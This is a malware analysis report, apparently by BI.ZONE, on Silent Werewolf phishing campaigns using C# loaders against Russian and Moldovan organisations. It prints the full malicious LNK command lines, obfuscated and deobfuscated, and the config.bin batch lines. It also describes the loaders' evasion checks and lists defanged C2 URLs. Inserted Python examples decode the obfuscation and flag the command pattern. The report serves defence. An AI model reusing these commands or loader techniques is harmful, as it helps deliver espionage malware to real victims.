Malware or LLM? Silent Werewolf employs new loaders to attack Russian and Moldovan organizations

BI.ZONE
May 27, 2025

The threat actor hinders payload retrieval, making it harder for researchers to trace the malware and analyze the cluster

In March 2025, BI.ZONE Threat Intelligence uncovered two new campaigns by Silent Werewolf. The first one focused on Russian organizations exclusively while the second targeted both Moldovan and, presumably, Russian companies. The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server. Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.

Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It is important to remember that the brands cannot be liable for the actions of criminals and associated damage.

Key findings

  • Phishing emails remain the adversaries’ preferred technique for targeted attacks, particularly those involving espionage.
  • The threat actor hinders payload retrieval to impede further analysis.
  • The extensive use of legitimate tools and malware code obfuscation allows the attackers to stay undetected for longer periods to achieve their goals.

Campaign 1

Target countries: Russia

Target industries: energy (nuclear), aircraft, instrumentation and mechanical engineering

Start date: 2025-03-11

The adversaries distributed a previously unknown obfuscated loader coded in C#. It was disguised as a pre-action letter addressed to the chairman of the Presidium of the Almaty City Bar Association and a residential construction project.

To deliver the malicious payload, the attackers distributed phishing emails containing a download link to a ZIP file. The archive included an LNK file and a nested ZIP. The latter encompassed a legitimate executable, a malicious DLL, and a decoy PDF.

We discovered two ZIP files, proyekt.zip and dokazatelstva.zip (fig. 1 and fig. 2).

Fig. 1. Phishing email
Fig. 2. Phishing email

These archives comprise the following:

  • An LNK file used to extract the nested archive and trigger the next stage.
  • A ZIP file disguised as a .ini configuration file, including:
    • a decoy PDF
    • the legitimate executable DeviceMetadataWizard.exe (version 10.0.17763.132), digitally signed by Microsoft Corporation
    • a malicious DLL that serves as a .NET loader

The LNK file finds the downloaded archive in the %USERPROFILE% directory. It also compiles the JScript.NET code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory. It then runs the extracted legitimate executable, which in turn loads the malicious DLL (the C# loader).

Here is a command example from доказательства_0007093.lnk:

cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"

This command triggers the following sequence:

  • cmd.exe /c "set PATH=%windir%\system32;%PATH% adds the system32 directory to the PATH environment variable, enabling access to system programs.
  • for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (...) runs a recursive search for dokazatelstva.zip in the %USERPROFILE% directory. If found, executes the @IF EXIST block, where:
    • chcp 65001 sets the console code page to UTF-8.
    • echo | set /p="<JScript.NET-code>" >%TEMP%\UKSS1G4Q7H6S.a writes the embedded JScript.NET code to a file.
    • for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" locates jsc.exe (the JScript.NET compiler) and stores its path in the _jsc variable.
    • for /L %i in (1,1,3) do runs the loop three times as follows:
      • @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) checks for the legitimate executable. If found, runs it minimized and exits. If not, goes to the next condition.
      • @if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") checks for unzip.exe. If found, runs it with the parameters %f (path to dokazatelstva.zip) and "%USERPROFILE%\J8ZUARAW71W7". If not, goes to the next condition.
      • @if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")) checks for unzip.exe_ and unzip.exe. If neither exists, compiles %TEMP%\UKSS1G4Q7H6S.a into %TEMP%\unzip.exe with the jsc.exe compiler. The compilation is invoked through forfiles.exe.

The unzip.exe file extracts the contents of the original ZIP into the designated directory, unpacks the nested ZIP, and renames itself to unzip.exe_ (fig. 3).

Fig. 3. Decompiled code of unzip.exe

The C# loader is a d3d9.dll library that is accessed via the H5GDXM70NJ.exe legitimate executable (DeviceMetadataWizard.exe) through DLL side-loading. The loader retrieves the malicious payload from the C2 server, saves it to the host's startup folder, and opens the decoy PDF.

The loader code is obfuscated, its strings encoded with Base64 and encrypted with XOR using a UTF-8 string key (fig. 4). Each loader instance employs a unique XOR key.

Fig. 4. Fragment of the decompiled obfuscated C# loader code

The C# loader has the following capabilities:

  • Checks startup arguments.
  • If run with the /startup argument, executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
  • If run without arguments, copies the test.cfg decoy to %USERPROFILE%\Documents\dokazatelstva.pdf and opens it with the command explorer %USERPROFILE%\Documents\dokazatelstva.pdf.
  • Creates an asynchronous task to download the malicious payload from the URL indicated in the loader configuration data (e.g., hxxps://pdf-bazaar[.]com/files2025/?pti=npu&yay=3oKPkD33tx5Tuzz). When calling the server, uses the following User-Agent header string: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36". The server response is decoded with Base64 and decrypted with the XOR key used for the encrypted strings. The contents are decoded again using Base64, then the loader creates the %APPDATA%\74EJ6RTFKKRS working directory and writes the final payload to %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
  • Within the same asynchronous task, spawns a separate thread and calls a function that copies H5GDXM70NJ.exe and d3d9.dll to the %APPDATA%\74EJ6RTFKKRS directory. Then, to gain persistence, creates the startapp.bat batch script in the startup folder. This script executes %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe with the /startup argument.
  • Within the same asynchronous task, spawns a separate thread and calls a function that executes the downloaded malicious payload %APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
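The layered decoding described above, written out as an added Python example (not code from the report or from the loader itself). The C2 response order is as the report states (Base64, then XOR with the UTF-8 string key, then Base64 again); for the loader's own strings the example assumes XOR first and Base64 second, and the key and payload are constructed stand-ins.

```python
import base64

# Constructed demo values (not the report's key or payload): the report says the
# key is a UTF-8 string, so the sample key deliberately includes a non-ASCII char.
DEMO_KEY = "demo-key-\u00e9"
DEMO_PAYLOAD = b"MZ\x90\x00" + b"\x00" * 12 + b"constructed stand-in, not a real PE"


def xor_bytes(data: bytes, key: str) -> bytes:
    """XOR data with the UTF-8 bytes of key, repeating the key as needed."""
    k = key.encode("utf-8")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def decode_string(obfuscated: str, key: str) -> str:
    """Undo the loader's string obfuscation: Base64 -> XOR -> UTF-8 text.
    Assumption: strings were XORed first and then Base64-encoded."""
    return xor_bytes(base64.b64decode(obfuscated), key).decode("utf-8")


def decode_payload(response: bytes, key: str) -> bytes:
    """Undo the three layers on the C2 response described in the report:
    Base64 -> XOR with the string key -> Base64."""
    inner = xor_bytes(base64.b64decode(response), key)
    return base64.b64decode(inner)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check for a decoded payload: PE files start with 'MZ'."""
    return data[:2] == b"MZ"


# Forward direction, used only to build the constructed samples for the demo.
def encode_string(text: str, key: str) -> str:
    return base64.b64encode(xor_bytes(text.encode("utf-8"), key)).decode("ascii")


def encode_payload(payload: bytes, key: str) -> bytes:
    return base64.b64encode(xor_bytes(base64.b64encode(payload), key))


if __name__ == "__main__":
    response = encode_payload(DEMO_PAYLOAD, DEMO_KEY)  # stands in for the C2 reply
    decoded = decode_payload(response, DEMO_KEY)
    print("PE header present:", looks_like_pe(decoded))
    print(decode_string(encode_string("/startup", DEMO_KEY), DEMO_KEY))
```

If a captured response decodes to something other than a PE (for instance a GGUF model file), the host most likely failed the actor's target checks rather than the decoding.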

The adversaries appear to run checks on target systems. If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf (fig. 5). This hinders comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.

Fig. 5. Downloading llama-2-70b.Q5_K_M.gguf from the C2 server instead of the malicious payload

Decoy examples are shown in fig. 6 and fig. 7.

Fig. 6. Decoy test.cfg (dokazatelstva.pdf)
Fig. 7. Decoy test.cfg (proyekt.pdf)

Campaign 2

Target countries: Moldova, Russia (presumably)

Target industries: n/a

Start date: 2025-03-18

A new version of the C# loader was disguised as an official vacation schedule and recommendations for protecting corporate information infrastructure against ransomware attacks. This time, Silent Werewolf focused on Moldovan and Russian organizations.

As in the previous campaign, the adversaries seemed to leverage phishing to distribute malicious emails containing a download link to a ZIP archive.

We discovered two ZIP files, Grafik_SL_0525.zip and Rekomendatsii_032025.pdf.zip.

These archives comprise the following:

  • Grafik_SLlnk / Rekomendatsii_032025.pdf.lnk, a malicious LNK file that includes a command to extract a nested ZIP and trigger the next stage.
  • config.bin, a file that includes CMD shell commands, an MSBuild task project, the task's original C# source code, and an encrypted and encoded payload. The latter contains a decoy PDF, two legitimate DLLs (Microsoft.Build.Framework.dll and Microsoft.Build.Utilities.Core.dll), and a malicious DLL that serves as the C# loader.
  • aini.dat, a file that includes random data not used by the malware.

The LNK file invokes the forfiles.exe utility to recursively search the %USERPROFILE% directory for a ZIP file matching the *[archive_name] mask (e.g., *Grafik_SL_0525.zip). The contents of each archive found are extracted to the %TEMP% folder using PowerShell. The config.bin is then read and commands are executed string by string in cmd.exe in silent mode (the /q flag).

Obfuscated LNK command:

forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"

Deobfuscated LNK command:

forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "powershell.exe -c Expand-Archive -F '[path to Grafik_SL_0525.zip]' %TEMP%|out-null;type ($env:TMP + '\config.bin') |cmd.exe /q|out-null"
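The hex-escape obfuscation in the LNK command above (0x77 for "w", 0x6c for "l", and so on) can be undone mechanically. The following is an added Python example, not code from the report: it decodes the command as printed and flags the traits a detection rule would key on (forfiles as a launcher, Expand-Archive, file contents piped into cmd.exe /q).

```python
import re

# The obfuscated LNK command exactly as printed in the report.
OBFUSCATED_CMD = (
    "forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "
    '"po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;'
    "type ($env:TMP + '\\config.bin') |c0x6d0x64.e0x780x65 /q|out-null\""
)

# One 0xNN token stands for one ASCII character.
HEX_ESCAPE = re.compile(r"0x([0-9a-fA-F]{2})")


def deobfuscate_hex_escapes(cmd: str) -> str:
    """Replace every 0xNN token with the character it encodes.
    Caveat: a genuine hex literal in a command line would be rewritten too,
    so treat the output as an analysis aid, not as a faithful re-execution."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), cmd)


def suspicious_forfiles_chain(cmd: str) -> list:
    """Return the reasons a command line matches the pattern in the report."""
    low = deobfuscate_hex_escapes(cmd).lower()
    reasons = []
    if low.startswith("forfiles") and " /c " in low:
        reasons.append("forfiles used as a proxy to launch another command")
    if "powershell" in low and "expand-archive" in low:
        reasons.append("PowerShell Expand-Archive invoked from forfiles")
    if re.search(r"\|\s*cmd(\.exe)?\s+/q", low):
        reasons.append("file contents piped into cmd.exe /q")
    if HEX_ESCAPE.search(cmd):
        reasons.append("hex-escape obfuscation in the command line")
    return reasons


if __name__ == "__main__":
    print(deobfuscate_hex_escapes(OBFUSCATED_CMD))
    for reason in suspicious_forfiles_chain(OBFUSCATED_CMD):
        print("-", reason)
```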

The config.bin file includes the following batch commands executed string by string:

  • mkdir %USERPROFILE%\Searches\winrt-{[GUID]}\
  • copy /Y %TEMP%\config.bin %USERPROFILE%\Searches\winrt-{[GUID]}\
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{[GUID]}\config.bin >nul 2>&1
  • exit

Example of a newly created directory: %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}.

As a result, a working directory is created at %USERPROFILE%\Searches\winrt-{[GUID]}. The config.bin file is copied here and then MSBuild is invoked to compile and execute a Build task (fig. 8).

Compiling and executing an MSBuild task:

  • exe C:\Users\[USERNAME]\Searches\winrt-{[GUID]}\config.bin
  • exe" /noconfig /fullpaths @"%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].cmdline"
  • exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%Temp%\[TEMP_FILENAME].tmp" "%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].TMP"

Fig. 8. Batch commands in config.bin

The Build task initiates two subtasks: TaskCreator and [A-Za-z0-9]{10,14} (e.g., B0xy2l4pee34x9).

TaskCreator reads encrypted and encoded files embedded in config.bin, decrypts, decodes, and reconstructs these files, and opens a decoy PDF (%TEMP%\(Grafik_SL_0525.pdf|Rekomendatsii_032025.pdf)). The files embedded in config.bin are encrypted using a Caesar (shift) cipher and encoded using Base64 (fig. 9). The TaskCreator code serves as a dropper.

Fig. 9. Fragment of encrypted and encoded files in config.bin

Decrypted and decoded files comprise:

  • Grafik_SL_0525.pdf / Rekomendatsii_032025.pdf, a decoy PDF.
  • [TASK_NAME].tmp, a malicious DLL that serves as the C# loader. The DLL name is indicated in config.bin and varies from case to case (e.g., B0xy2l4pee34x9.tmp).
  • Microsoft.Build.Framework.dll, a legitimate file.
  • Microsoft.Build.Utilities.Core.dll, a legitimate file.
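Recovering the files embedded in config.bin, as an added Python example (not code from the report or from TaskCreator). The report gives only "Caesar (shift) cipher and Base64", so the order and alphabet are assumptions: the example assumes the Base64 text was shifted over the ASCII letters and brute-forces the shift using the reconstructed files' magic bytes; the sample blob is constructed.

```python
import base64
import string
from typing import Optional, Tuple

# File types the dropper reconstructs according to the report: a decoy PDF and DLLs.
MAGICS = {b"%PDF-": "PDF", b"MZ": "PE/DLL"}


def caesar_shift(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions (mod 26); digits, '+', '/' and '=' stay."""
    out = []
    for ch in text:
        if ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        elif ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        else:
            out.append(ch)
    return "".join(out)


def identify(data: bytes) -> Optional[str]:
    for magic, name in MAGICS.items():
        if data.startswith(magic):
            return name
    return None


def recover_embedded_file(blob: str) -> Optional[Tuple[int, str, bytes]]:
    """Try all 26 shifts; return (shift, file type, bytes) for the first that
    decodes to a known file type. Every shift keeps the text inside the Base64
    alphabet, so the magic bytes, not Base64 validity, pick the right shift."""
    for shift in range(26):
        try:
            data = base64.b64decode(caesar_shift(blob, -shift), validate=True)
        except ValueError:
            continue  # not Base64 at all: no shift will help
        kind = identify(data)
        if kind:
            return shift, kind, data
    return None


# Constructed sample (not from config.bin): a fake PDF header, Base64-encoded,
# then shifted by 7 the way the assumed scheme would store it.
DEMO_SHIFT = 7
DEMO_FILE = b"%PDF-1.7\n% constructed decoy stand-in\n"
DEMO_BLOB = caesar_shift(base64.b64encode(DEMO_FILE).decode("ascii"), DEMO_SHIFT)

if __name__ == "__main__":
    print(recover_embedded_file(DEMO_BLOB))
```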

The C# loader runs with the following Base64-encoded parameters (fig. 10):

  1. Path to the working directory.
  2. XOR key to decrypt the malicious payload.
  3. URL for downloading the malicious payload.
  4. User-Agent header string.
  5. Name for the downloaded file.
  6. Parameter to check certain conditions within the program.

Fig. 10. Encoded parameters for the B0xy2l4pee34x9 task in config.bin

One of the loader runs, for example, uses the following decoded parameters: "%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\", "BSX4neaFa5zahRcCcSxGudPU8GprbySA", "hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=VbU5NQSLczxyvEDVzIDZR6Z3Hwp48u1m", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", "MemoryDataProcess.exe", "ea".

A randomly named task (B0xy2l4pee34x9) invokes the C# loader in the form of a DLL, with its code obfuscated using Obfuscar. Before executing its core code, the loader checks startup conditions to verify that the decoded XOR key (parameter 2) contains a substring (parameter 6) at a specific offset, the username is not "JohnDoe", the machine name is not "HAL9TH", and the NUMBER_OF_PROCESSORS variable is not null. If any of these conditions is not met, the loader terminates (fig. 11).

Fig. 11. C# loader checking startup conditions

The loader decodes the Base64-encoded strings received as parameters. It then creates and deletes from 100 to 200 random files within the working directory %USERPROFILE%\Searches\winrt-{[GUID]}\[RANDOM_NAME]. Afterward, it downloads an XOR-encrypted malicious payload from the specified URL (hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=BrNCqgeaXXo94U18qUGqii5PpjGTk2va), saves it to the working directory (%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\MemoryDataProcess.exe), decrypts it, and executes it. The payload is a PE file.

Decoy examples are shown in fig. 12 and fig. 13.

Fig. 12. Decoy Grafik_SL_0525.pdf
Fig. 13. Decoy Rekomendatsii_032025.pdf

Indicators of compromise

How to protect your company from such threats

Phishing is one of the most popular attack vectors against organizations. You can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications. The solution carefully examines every incoming message to identify and block illegitimate content. BI.ZONE Mail Security uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This kind of inspection does not slow down the delivery of secure emails.

Attacks similar to those by Silent Werewolf are not only critical to detect but also to neutralize before they affect the infrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.
